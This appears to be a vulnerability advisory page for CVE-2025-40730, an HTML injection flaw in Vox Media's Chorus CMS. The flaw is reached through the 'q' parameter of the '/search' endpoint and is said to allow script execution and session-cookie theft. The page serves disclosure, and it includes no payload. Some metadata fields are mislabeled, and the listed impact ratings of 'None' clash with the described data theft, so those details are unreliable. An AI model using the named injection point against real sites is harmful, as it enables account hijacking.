HTML Injection Flaw in Vox Media's Chorus CMS
CVE-2025-40730

4.8MEDIUM

Key Information:

Vendor: Vox Media
Status: Chorus Cms
Vendor: CVE Published:; 28 July 2025

What is CVE-2025-40730?

A security vulnerability in Vox Media's Chorus CMS allows an attacker to exploit HTML injection, enabling the execution of malicious JavaScript code in the victim's browser. By manipulating the 'q' parameter in the '/search' endpoint, threat actors can craft harmful URLs that, when clicked by users, may lead to data theft, including session cookies. Consequently, this can facilitate unauthorized actions on behalf of the victim, posing significant risks to user data and application integrity.

Affected Version(s)

Chorus CMS all versions

References

https://www.incibe.es/en/incibe-cert/notices/aviso/html-i...

CVSS V4

Score:

4.8

Severity:

MEDIUM

Confidentiality:

None

Integrity:

None

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

Unknown

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jul 28, 2025
Vulnerability Reserved
Apr 16, 2025

Credit

Gonzalo Aguilar García (6h4ack)